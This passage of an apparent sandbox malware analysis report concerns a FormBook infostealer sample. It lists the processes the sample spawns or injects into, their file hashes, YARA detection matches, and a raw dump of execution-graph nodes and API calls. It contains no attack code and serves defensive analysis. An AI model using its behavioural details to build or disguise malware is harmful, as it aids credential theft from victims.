            Start date: 02/08/2024
            Path: C:\Users\user\Desktop\QLLafoDdqv.exe
            Wow64 process (32bit): true
            Commandline: "C:\Users\user\Desktop\QLLafoDdqv.exe"
            Imagebase: 0x6d0000
            File size: 1'229'824 bytes
            MD5 hash: 9F295F94DFAF4A72EF4AAA28E15543F5
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Reputation: low
            Has exited: true

            Target ID: 2
            Start time: 07:50:23
            Start date: 02/08/2024
            Path: C:\Windows\SysWOW64\svchost.exe
            Wow64 process (32bit): true
            Commandline: "C:\Users\user\Desktop\QLLafoDdqv.exe"
            Imagebase: 0x110000
            File size: 46'504 bytes
            MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            Reputation: moderate
            Has exited: true

            Target ID: 3
            Start time: 07:50:31
            Start date: 02/08/2024
            Path: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Wow64 process (32bit): true
            Commandline: "C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe"
            Imagebase: 0xd50000
            File size: 140'800 bytes
            MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges: false
            Has administrator privileges: false
            Programmed in: C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation: high
            Has exited: false

            Target ID: 4
            Start time: 07:50:32
            Start date: 02/08/2024
            Path: C:\Windows\SysWOW64\netbtugc.exe
            Wow64 process (32bit): true
            Commandline: "C:\Windows\SysWOW64\netbtugc.exe"
            Imagebase: 0x1f0000
            File size: 22'016 bytes
            MD5 hash: EE7BBA75B36D54F9E420EB6EE960D146
            Has elevated privileges: false
            Has administrator privileges: false
            Programmed in: C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation: moderate
            Has exited: false

            Target ID: 8
            Start time: 07:50:45
            Start date: 02/08/2024
            Path: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Wow64 process (32bit): true
            Commandline: "C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe"
            Imagebase: 0xd50000
            File size: 140'800 bytes
            MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges: false
            Has administrator privileges: false
            Programmed in: C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation: high
            Has exited: false

            Target ID: 9
            Start time: 07:50:56
            Start date: 02/08/2024
            Path: C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit): false
            Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase: 0x7ff728280000
            File size: 676'768 bytes
            MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges: false
            Has administrator privileges: false
            Programmed in: C, C++ or other language
            Reputation: high
            Has exited: true


              Execution Graph

              Execution Coverage: 3.5%
              Dynamic/Decrypted Code Coverage: 0.4%
              Signature Coverage: 4.5%
              Total number of Nodes: 2000
              Total number of Limit Nodes: 62
              execution_graph: node and edge data of the interactive execution graph (function addresses, call edges and API names, among them SystemParametersInfoW, RaiseException, RtlAllocateHeap, GetPEB, Sleep, LoadLibraryA, GetProcAddress, CreateStreamOnHGlobal, FindResourceExW, LoadResource, GetOpenFileNameW, GetLongPathNameW, GetFullPathNameW, CreateThread, DuplicateHandle, OleInitialize, RegisterWindowMessageW, GetConsoleMode, ReadFile, ReadConsoleW); the rendered graph is not reproduced here.
___scrt_is_nonwritable_in_current_image 95742->95743 95744 7059d2 95743->95744 95745 7059ea 95743->95745 95747 705a88 95745->95747 95751 705a1f 95745->95751 95914 72d8dd GetTempPathW 95915 72d8fa 95914->95915 95915->95915 95916 6ddddc 95919 6db710 95916->95919 95920 6db72b 95919->95920 95921 720146 95920->95921 95922 7200f8 95920->95922 95949 6db750 95920->95949 95961 7558a2 235 API calls 2 library calls 95921->95961 95925 720102 95922->95925 95928 72010f 95922->95928 95922->95949 95959 755d33 235 API calls 95925->95959 95945 6dba20 95928->95945 95960 7561d0 235 API calls 2 library calls 95928->95960 95931 6ed336 40 API calls 95931->95949 95932 7203d9 95932->95932 95936 720322 95964 755c0c 82 API calls 95936->95964 95940 6dba4e 95944 6dbbe0 40 API calls 95944->95949 95945->95940 95965 74359c 82 API calls __wsopen_s 95945->95965 95946 6dec40 235 API calls 95946->95949 95947 6da8c7 22 API calls 95947->95949 95949->95931 95949->95936 95949->95940 95949->95944 95949->95945 95949->95946 95949->95947 95950 6da81b 41 API calls 95949->95950 95951 6ed2f0 40 API calls 95949->95951 95952 6ea01b 235 API calls 95949->95952 95953 6f0242 5 API calls __Init_thread_wait 95949->95953 95954 6eedcd 22 API calls 95949->95954 95955 6f00a3 29 API calls __onexit 95949->95955 95956 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95949->95956 95957 6eee53 82 API calls 95949->95957 95958 6ee5ca 235 API calls 95949->95958 95962 6daceb 23 API calls ISource 95949->95962 95963 72f6bf 23 API calls 95949->95963 95950->95949 95951->95949 95952->95949 95953->95949 95954->95949 95955->95949 95956->95949 95957->95949 95958->95949 95959->95928 95960->95945 95961->95949 95962->95949 95963->95949 95964->95945 95965->95932 95966 722a00 95980 6dd7b0 ISource 95966->95980 95967 6ddb11 PeekMessageW 95967->95980 95968 6dd807 GetInputState 95968->95967 95968->95980 95970 721cbe TranslateAcceleratorW 95970->95980 95971 6dda04 timeGetTime 95971->95980 95972 6ddb8f PeekMessageW 95972->95980 
95973 6ddb73 TranslateMessage DispatchMessageW 95973->95972 95974 6ddbaf Sleep 95988 6ddbc0 95974->95988 95975 722b74 Sleep 95975->95988 95976 6ee551 timeGetTime 95976->95988 95977 721dda timeGetTime 96087 6ee300 23 API calls 95977->96087 95980->95967 95980->95968 95980->95970 95980->95971 95980->95972 95980->95973 95980->95974 95980->95975 95980->95977 95983 6dd9d5 95980->95983 95994 6dec40 235 API calls 95980->95994 95996 6dbf40 235 API calls 95980->95996 95998 6ddd50 95980->95998 96005 6ddfd0 95980->96005 96028 6e1310 95980->96028 96086 6eedf6 IsDialogMessageW GetClassLongW 95980->96086 96088 743a2a 23 API calls 95980->96088 96089 74359c 82 API calls __wsopen_s 95980->96089 95981 722c0b GetExitCodeProcess 95986 722c21 WaitForSingleObject 95981->95986 95987 722c37 CloseHandle 95981->95987 95982 722a31 95982->95983 95984 7629bf GetForegroundWindow 95984->95988 95986->95980 95986->95987 95987->95988 95988->95976 95988->95980 95988->95981 95988->95982 95988->95983 95988->95984 95989 722ca9 Sleep 95988->95989 96090 755658 23 API calls 95988->96090 96091 73e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95988->96091 96092 73d4dc 47 API calls 95988->96092 95989->95980 95994->95980 95996->95980 95999 6ddd6f 95998->95999 96000 6ddd83 95998->96000 96093 6dd260 235 API calls 2 library calls 95999->96093 96094 74359c 82 API calls __wsopen_s 96000->96094 96003 6ddd7a 96003->95980 96004 722f75 96004->96004 96006 6de010 96005->96006 96022 6de0dc ISource 96006->96022 96097 6f0242 5 API calls __Init_thread_wait 96006->96097 96009 722fca 96011 6da961 22 API calls 96009->96011 96009->96022 96010 6da961 22 API calls 96010->96022 96012 722fe4 96011->96012 96098 6f00a3 29 API calls __onexit 96012->96098 96016 722fee 96099 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96016->96099 96020 6dec40 235 API calls 96020->96022 96021 6da8c7 22 API calls 96021->96022 96022->96010 96022->96020 96022->96021 96023 74359c 82 API 
calls 96022->96023 96024 6de3e1 96022->96024 96025 6e04f0 22 API calls 96022->96025 96095 6da81b 41 API calls 96022->96095 96096 6ea308 235 API calls 96022->96096 96100 6f0242 5 API calls __Init_thread_wait 96022->96100 96101 6f00a3 29 API calls __onexit 96022->96101 96102 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96022->96102 96103 7547d4 235 API calls 96022->96103 96104 7568c1 235 API calls 96022->96104 96023->96022 96024->95980 96025->96022 96029 6e1376 96028->96029 96030 6e17b0 96028->96030 96031 726331 96029->96031 96032 6e1390 96029->96032 96212 6f0242 5 API calls __Init_thread_wait 96030->96212 96223 75709c 235 API calls 96031->96223 96035 6e1940 9 API calls 96032->96035 96034 6e17ba 96038 6e17fb 96034->96038 96213 6d9cb3 96034->96213 96039 6e13a0 96035->96039 96037 72633d 96037->95980 96043 726346 96038->96043 96045 6e182c 96038->96045 96041 6e1940 9 API calls 96039->96041 96042 6e13b6 96041->96042 96042->96038 96044 6e13ec 96042->96044 96224 74359c 82 API calls __wsopen_s 96043->96224 96044->96043 96068 6e1408 __fread_nolock 96044->96068 96220 6daceb 23 API calls ISource 96045->96220 96048 6e1839 96221 6ed217 235 API calls 96048->96221 96049 6e17d4 96219 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96049->96219 96052 72636e 96225 74359c 82 API calls __wsopen_s 96052->96225 96053 6e152f 96055 6e153c 96053->96055 96056 7263d1 96053->96056 96058 6e1940 9 API calls 96055->96058 96227 755745 54 API calls _wcslen 96056->96227 96060 6e1549 96058->96060 96059 6efddb 22 API calls 96059->96068 96063 7264fa 96060->96063 96065 6e1940 9 API calls 96060->96065 96061 6e1872 96222 6efaeb 23 API calls 96061->96222 96062 6efe0b 22 API calls 96062->96068 96072 726369 96063->96072 96228 74359c 82 API calls __wsopen_s 96063->96228 96070 6e1563 96065->96070 96067 6dec40 235 API calls 96067->96068 96068->96048 96068->96052 96068->96053 96068->96059 96068->96062 96068->96067 96069 7263b2 96068->96069 96068->96072 96226 74359c 82 
API calls __wsopen_s 96069->96226 96070->96063 96073 6da8c7 22 API calls 96070->96073 96075 6e15c7 ISource 96070->96075 96072->95980 96073->96075 96074 6e1940 9 API calls 96074->96075 96075->96061 96075->96063 96075->96072 96075->96074 96078 6e167b ISource 96075->96078 96079 6d4f39 68 API calls 96075->96079 96105 759c4d 96075->96105 96113 746ef1 96075->96113 96193 75959f 96075->96193 96196 74f0ec 96075->96196 96205 75958b 96075->96205 96208 73d4ce 96075->96208 96076 6e171d 96076->95980 96078->96076 96211 6ece17 22 API calls ISource 96078->96211 96079->96075 96086->95980 96087->95980 96088->95980 96089->95980 96090->95988 96091->95988 96092->95988 96093->96003 96094->96004 96095->96022 96096->96022 96097->96009 96098->96016 96099->96022 96100->96022 96101->96022 96102->96022 96103->96022 96104->96022 96106 759ca8 96105->96106 96112 759c68 96105->96112 96107 759cc6 96106->96107 96261 6db567 39 API calls 96106->96261 96110 759d23 96107->96110 96107->96112 96262 6db567 39 API calls 96107->96262 96229 73f9b8 96110->96229 96112->96075 96114 6da961 22 API calls 96113->96114 96115 746f1d 96114->96115 96116 6da961 22 API calls 96115->96116 96117 746f26 96116->96117 96118 746f3a 96117->96118 96571 6db567 39 API calls 96117->96571 96120 6d7510 53 API calls 96118->96120 96121 746f57 _wcslen 96120->96121 96122 746fbc 96121->96122 96123 7470bf 96121->96123 96192 7470e9 96121->96192 96125 6d7510 53 API calls 96122->96125 96124 6d4ecb 94 API calls 96123->96124 96127 7470d0 96124->96127 96126 746fc8 96125->96126 96130 6da8c7 22 API calls 96126->96130 96135 746fdb 96126->96135 96128 7470e5 96127->96128 96131 6d4ecb 94 API calls 96127->96131 96129 6da961 22 API calls 96128->96129 96128->96192 96132 74711a 96129->96132 96130->96135 96131->96128 96133 6da961 22 API calls 96132->96133 96137 747126 96133->96137 96134 747027 96136 6d7510 53 API calls 96134->96136 96135->96134 96138 747005 96135->96138 96141 6da8c7 22 API calls 96135->96141 96139 747034 96136->96139 96140 6da961 22 API 
calls 96137->96140 96572 6d33c6 96138->96572 96143 747047 96139->96143 96144 74703d 96139->96144 96145 74712f 96140->96145 96141->96138 96581 73e199 GetFileAttributesW 96143->96581 96147 6da8c7 22 API calls 96144->96147 96149 6da961 22 API calls 96145->96149 96146 74700f 96150 6d7510 53 API calls 96146->96150 96147->96143 96152 747138 96149->96152 96153 74701b 96150->96153 96151 747050 96154 747063 96151->96154 96157 6d4c6d 22 API calls 96151->96157 96155 6d7510 53 API calls 96152->96155 96156 6d6350 22 API calls 96153->96156 96159 6d7510 53 API calls 96154->96159 96164 747069 96154->96164 96158 747145 96155->96158 96156->96134 96157->96154 96411 6d525f 96158->96411 96160 7470a0 96159->96160 96582 73d076 57 API calls 96160->96582 96163 747166 96165 6d4c6d 22 API calls 96163->96165 96164->96192 96166 747175 96165->96166 96167 7471a9 96166->96167 96169 6d4c6d 22 API calls 96166->96169 96168 6da8c7 22 API calls 96167->96168 96171 7471ba 96168->96171 96170 747186 96169->96170 96170->96167 96173 6d6b57 22 API calls 96170->96173 96453 6d6350 96171->96453 96175 74719b 96173->96175 96177 6d6b57 22 API calls 96175->96177 96176 6d6350 22 API calls 96178 7471d6 96176->96178 96177->96167 96179 6d6350 22 API calls 96178->96179 96180 7471e4 96179->96180 96181 6d7510 53 API calls 96180->96181 96182 7471f0 96181->96182 96462 73d7bc 96182->96462 96184 747201 96185 73d4ce 4 API calls 96184->96185 96186 74720b 96185->96186 96187 6d7510 53 API calls 96186->96187 96191 747239 96186->96191 96188 747229 96187->96188 96516 742947 96188->96516 96190 6d4f39 68 API calls 96190->96192 96191->96190 96192->96075 96618 757f59 96193->96618 96195 7595af 96195->96075 96197 6d7510 53 API calls 96196->96197 96198 74f126 96197->96198 96710 6d9e90 96198->96710 96200 74f136 96201 74f15b 96200->96201 96202 6dec40 235 API calls 96200->96202 96203 6d9c6e 22 API calls 96201->96203 96204 74f15f 96201->96204 96202->96201 96203->96204 96204->96075 96206 757f59 120 API calls 96205->96206 96207 75959b 
96206->96207 96207->96075 96750 73dbbe lstrlenW 96208->96750 96211->96078 96212->96034 96214 6d9cc2 _wcslen 96213->96214 96215 6efe0b 22 API calls 96214->96215 96216 6d9cea __fread_nolock 96215->96216 96217 6efddb 22 API calls 96216->96217 96218 6d9d00 96217->96218 96218->96049 96219->96038 96220->96048 96221->96061 96222->96061 96223->96037 96224->96072 96225->96072 96226->96072 96227->96070 96228->96072 96263 73f8f0 96229->96263 96232 73fa51 96235 73fab7 96232->96235 96238 73fa61 96232->96238 96233 73fa39 96270 73fc2f 96233->96270 96236 73fae7 96235->96236 96237 73fb4d 96235->96237 96243 73f9df __fread_nolock 96235->96243 96239 73fb17 96236->96239 96240 73faec 96236->96240 96241 73fbf6 96237->96241 96242 73fb56 96237->96242 96260 73fa99 96238->96260 96326 741e96 24 API calls 96238->96326 96239->96243 96331 6db6b5 39 API calls 96239->96331 96240->96243 96330 6db6b5 39 API calls 96240->96330 96241->96243 96335 6db38f 39 API calls 96241->96335 96244 73fbd3 96242->96244 96245 73fb5b 96242->96245 96243->96112 96244->96243 96334 6db38f 39 API calls 96244->96334 96250 73fb61 96245->96250 96251 73fb9a 96245->96251 96250->96243 96332 6db38f 39 API calls 96250->96332 96251->96243 96333 6db38f 39 API calls 96251->96333 96255 73fa6d 96327 741e96 24 API calls 96255->96327 96258 73fa84 __fread_nolock 96328 741e96 24 API calls 96258->96328 96329 740e85 22 API calls ___scrt_fastfail 96260->96329 96261->96107 96262->96110 96264 73f93d 96263->96264 96268 73f901 96263->96268 96360 6db567 39 API calls 96264->96360 96265 73f93b 96265->96232 96265->96233 96265->96243 96268->96265 96336 6d7510 96268->96336 96359 6f4a28 40 API calls 3 library calls 96268->96359 96271 73fda3 96270->96271 96272 73fc43 96270->96272 96274 6da961 22 API calls 96271->96274 96272->96271 96273 73fc4d 96272->96273 96275 73fc63 96273->96275 96276 73fd1a 96273->96276 96277 73fdab 96274->96277 96278 6da961 22 API calls 96275->96278 96279 73fd1e 96276->96279 96280 73fd5d 96276->96280 96281 73fdb1 96277->96281 96289 
73fe20 __fread_nolock 96277->96289 96283 73fc6b 96278->96283 96284 6efe0b 22 API calls 96279->96284 96282 6efe0b 22 API calls 96280->96282 96290 73fdc9 96281->96290 96291 73fdbf 96281->96291 96285 73fd76 __fread_nolock 96282->96285 96286 6d7510 53 API calls 96283->96286 96287 73fd27 __fread_nolock 96284->96287 96297 6d9c6e 22 API calls 96285->96297 96288 73fc75 96286->96288 96365 73ebd1 96287->96365 96294 73fc81 96288->96294 96295 73fcd9 96288->96295 96408 73f24a 22 API calls 96289->96408 96293 6d7510 53 API calls 96290->96293 96402 6db567 39 API calls 96291->96402 96296 73fdc4 96293->96296 96298 73fc8c 96294->96298 96302 6d7510 53 API calls 96294->96302 96299 73fce6 96295->96299 96303 6d7510 53 API calls 96295->96303 96403 73f24a 22 API calls 96296->96403 96325 73fcbf __fread_nolock 96297->96325 96305 6d7510 53 API calls 96298->96305 96307 6d7510 53 API calls 96299->96307 96302->96298 96303->96299 96310 73fc9a 96305->96310 96306 73fe5e 96409 6d62b5 22 API calls 96306->96409 96312 73fcf4 96307->96312 96386 6d6d25 96310->96386 96315 6d6d25 22 API calls 96312->96315 96313 73fddf 96404 6d62b5 22 API calls 96313->96404 96318 73fd02 96315->96318 96317 73fca8 96399 6d62b5 22 API calls 96317->96399 96401 6d62b5 22 API calls 96318->96401 96320 73fdeb 96405 6d4c6d 96320->96405 96322 73fcb4 96400 73efae 24 API calls _wcslen 96322->96400 96325->96243 96326->96255 96327->96258 96328->96260 96329->96243 96330->96243 96331->96243 96332->96243 96333->96243 96334->96243 96335->96243 96337 6d7525 96336->96337 96354 6d7522 96336->96354 96338 6d752d 96337->96338 96339 6d755b 96337->96339 96361 6f51c6 26 API calls 96338->96361 96341 6d756d 96339->96341 96346 71500f 96339->96346 96349 7150f6 96339->96349 96362 6efb21 51 API calls 96341->96362 96344 6d753d 96348 6efddb 22 API calls 96344->96348 96345 71510e 96345->96345 96352 715088 96346->96352 96353 6efe0b 22 API calls 96346->96353 96350 6d7547 96348->96350 96364 6f5183 26 API calls 96349->96364 96351 6d9cb3 22 API calls 96350->96351 
96351->96354 96363 6efb21 51 API calls 96352->96363 96356 715058 96353->96356 96354->96268 96355 6efddb 22 API calls 96357 71507f 96355->96357 96356->96355 96358 6d9cb3 22 API calls 96357->96358 96358->96352 96359->96268 96360->96265 96361->96344 96362->96344 96363->96349 96364->96345 96366 73ebe0 _strlen 96365->96366 96367 73ec37 96365->96367 96368 73ebef MultiByteToWideChar 96366->96368 96372 6d9c6e 96367->96372 96368->96367 96369 73ec04 96368->96369 96370 6efe0b 22 API calls 96369->96370 96371 73ec20 MultiByteToWideChar 96370->96371 96371->96367 96373 6d9c7e 96372->96373 96374 71f545 96372->96374 96379 6efddb 22 API calls 96373->96379 96375 71f556 96374->96375 96377 6d6b57 22 API calls 96374->96377 96376 6da6c3 22 API calls 96375->96376 96378 71f560 96376->96378 96377->96375 96378->96378 96380 6d9c91 96379->96380 96381 6d9cac 96380->96381 96382 6d9c9a 96380->96382 96384 6da961 22 API calls 96381->96384 96383 6d9cb3 22 API calls 96382->96383 96385 6d9ca2 96383->96385 96384->96385 96385->96325 96387 6d6d34 96386->96387 96388 6d6d91 96386->96388 96387->96388 96389 6d6d3f 96387->96389 96390 6d93b2 22 API calls 96388->96390 96392 6d6d5a 96389->96392 96393 714c9d 96389->96393 96391 6d6d62 __fread_nolock 96390->96391 96391->96317 96410 6d6f34 22 API calls 96392->96410 96394 6efddb 22 API calls 96393->96394 96396 714ca7 96394->96396 96397 6efe0b 22 API calls 96396->96397 96398 714cda 96397->96398 96399->96322 96400->96325 96401->96325 96402->96296 96403->96313 96404->96320 96406 6daec9 22 API calls 96405->96406 96407 6d4c78 96406->96407 96407->96325 96408->96306 96409->96325 96410->96391 96412 6da961 22 API calls 96411->96412 96413 6d5275 96412->96413 96414 6da961 22 API calls 96413->96414 96415 6d527d 96414->96415 96416 6da961 22 API calls 96415->96416 96417 6d5285 96416->96417 96418 6da961 22 API calls 96417->96418 96419 6d528d 96418->96419 96420 713df5 96419->96420 96421 6d52c1 96419->96421 96422 6da8c7 22 API calls 96420->96422 96423 6d6d25 22 API calls 96421->96423 
96424 713dfe 96422->96424 96425 6d52cf 96423->96425 96426 6da6c3 22 API calls 96424->96426 96427 6d93b2 22 API calls 96425->96427 96429 6d5304 96426->96429 96428 6d52d9 96427->96428 96428->96429 96431 6d6d25 22 API calls 96428->96431 96430 6d5349 96429->96430 96432 6d5325 96429->96432 96449 713e20 96429->96449 96433 6d6d25 22 API calls 96430->96433 96434 6d52fa 96431->96434 96432->96430 96437 6d4c6d 22 API calls 96432->96437 96436 6d535a 96433->96436 96435 6d93b2 22 API calls 96434->96435 96435->96429 96438 6d5370 96436->96438 96442 6da8c7 22 API calls 96436->96442 96440 6d5332 96437->96440 96439 6d5384 96438->96439 96444 6da8c7 22 API calls 96438->96444 96443 6d538f 96439->96443 96446 6da8c7 22 API calls 96439->96446 96440->96430 96445 6d6d25 22 API calls 96440->96445 96441 6d6b57 22 API calls 96450 713ee0 96441->96450 96442->96438 96447 6da8c7 22 API calls 96443->96447 96451 6d539a 96443->96451 96444->96439 96445->96430 96446->96443 96447->96451 96448 6d4c6d 22 API calls 96448->96450 96449->96441 96450->96430 96450->96448 96583 6d49bd 22 API calls __fread_nolock 96450->96583 96451->96163 96454 714a51 96453->96454 96455 6d6362 96453->96455 96594 6d4a88 22 API calls __fread_nolock 96454->96594 96584 6d6373 96455->96584 96458 6d636e 96458->96176 96459 714a5b 96460 6da8c7 22 API calls 96459->96460 96461 714a67 96459->96461 96460->96461 96463 73d7d8 96462->96463 96464 73d7f3 96463->96464 96465 73d7dd 96463->96465 96466 6da961 22 API calls 96464->96466 96467 6da8c7 22 API calls 96465->96467 96515 73d7ee 96465->96515 96468 73d7fb 96466->96468 96467->96515 96469 6da961 22 API calls 96468->96469 96470 73d803 96469->96470 96471 6da961 22 API calls 96470->96471 96472 73d80e 96471->96472 96473 6da961 22 API calls 96472->96473 96474 73d816 96473->96474 96475 6da961 22 API calls 96474->96475 96476 73d81e 96475->96476 96477 6da961 22 API calls 96476->96477 96478 73d826 96477->96478 96479 6da961 22 API calls 96478->96479 96480 73d82e 96479->96480 96481 6da961 22 API calls 
96480->96481 96482 73d836 96481->96482 96483 6d525f 22 API calls 96482->96483 96484 73d84d 96483->96484 96485 6d525f 22 API calls 96484->96485 96486 73d866 96485->96486 96487 6d4c6d 22 API calls 96486->96487 96488 73d872 96487->96488 96489 73d885 96488->96489 96490 6d93b2 22 API calls 96488->96490 96491 6d4c6d 22 API calls 96489->96491 96490->96489 96492 73d88e 96491->96492 96493 73d89e 96492->96493 96494 6d93b2 22 API calls 96492->96494 96495 73d8b0 96493->96495 96496 6da8c7 22 API calls 96493->96496 96494->96493 96497 6d6350 22 API calls 96495->96497 96496->96495 96498 73d8bb 96497->96498 96600 73d978 22 API calls 96498->96600 96500 73d8ca 96601 73d978 22 API calls 96500->96601 96502 73d8dd 96503 6d4c6d 22 API calls 96502->96503 96504 73d8e7 96503->96504 96505 73d8fe 96504->96505 96506 73d8ec 96504->96506 96508 6d4c6d 22 API calls 96505->96508 96507 6d33c6 22 API calls 96506->96507 96510 73d8f9 96507->96510 96509 73d907 96508->96509 96511 73d925 96509->96511 96512 6d33c6 22 API calls 96509->96512 96513 6d6350 22 API calls 96510->96513 96514 6d6350 22 API calls 96511->96514 96512->96510 96513->96511 96514->96515 96515->96184 96517 742954 __wsopen_s 96516->96517 96518 6efe0b 22 API calls 96517->96518 96519 742971 96518->96519 96520 6d5722 22 API calls 96519->96520 96521 74297b 96520->96521 96522 74274e 27 API calls 96521->96522 96523 742986 96522->96523 96524 6d511f 64 API calls 96523->96524 96525 74299b 96524->96525 96526 742a6c 96525->96526 96527 7429bf 96525->96527 96528 742e66 75 API calls 96526->96528 96529 742e66 75 API calls 96527->96529 96544 742a38 96528->96544 96530 7429c4 96529->96530 96535 742a75 ISource 96530->96535 96606 6fd583 26 API calls 96530->96606 96532 6d50f5 40 API calls 96533 742a91 96532->96533 96534 6d50f5 40 API calls 96533->96534 96537 742aa1 96534->96537 96535->96191 96536 7429ed 96607 6fd583 26 API calls 96536->96607 96538 6d50f5 40 API calls 96537->96538 96540 742abc 96538->96540 96541 6d50f5 40 API calls 96540->96541 96542 742acc 
96541->96542 96543 6d50f5 40 API calls 96542->96543 96545 742ae7 96543->96545 96544->96532 96544->96535 96546 6d50f5 40 API calls 96545->96546 96547 742af7 96546->96547 96548 6d50f5 40 API calls 96547->96548 96549 742b07 96548->96549 96550 6d50f5 40 API calls 96549->96550 96551 742b17 96550->96551 96602 743017 GetTempPathW GetTempFileNameW 96551->96602 96553 742b22 96554 6fe5eb 29 API calls 96553->96554 96555 742b33 96554->96555 96555->96535 96558 6d50f5 40 API calls 96555->96558 96565 6fdbb3 65 API calls 96555->96565 96567 742bed 96555->96567 96556 6fe678 67 API calls 96557 742bf8 96556->96557 96559 742c12 96557->96559 96560 742bfe DeleteFileW 96557->96560 96558->96555 96560->96535 96565->96555 96567->96556 96571->96118 96573 6d33dd 96572->96573 96574 7130bb 96572->96574 96608 6d33ee 96573->96608 96576 6efddb 22 API calls 96574->96576 96578 7130c5 _wcslen 96576->96578 96577 6d33e8 96577->96146 96579 6efe0b 22 API calls 96578->96579 96580 7130fe __fread_nolock 96579->96580 96581->96151 96582->96164 96583->96450 96586 6d6382 96584->96586 96591 6d63b6 __fread_nolock 96584->96591 96585 714a82 96588 6efddb 22 API calls 96585->96588 96586->96585 96587 6d63a9 96586->96587 96586->96591 96595 6da587 96587->96595 96590 714a91 96588->96590 96592 6efe0b 22 API calls 96590->96592 96591->96458 96593 714ac5 __fread_nolock 96592->96593 96594->96459 96596 6da59d 96595->96596 96599 6da598 __fread_nolock 96595->96599 96597 6efe0b 22 API calls 96596->96597 96598 71f80f 96596->96598 96597->96599 96599->96591 96600->96500 96601->96502 96602->96553 96606->96536 96607->96544 96609 6d33fe _wcslen 96608->96609 96610 71311d 96609->96610 96611 6d3411 96609->96611 96613 6efddb 22 API calls 96610->96613 96612 6da587 22 API calls 96611->96612 96614 6d341e __fread_nolock 96612->96614 96615 713127 96613->96615 96614->96577 96616 6efe0b 22 API calls 96615->96616 96617 713157 __fread_nolock 96616->96617 96619 6d7510 53 API calls 96618->96619 96620 757f90 96619->96620 96636 757fd5 ISource 
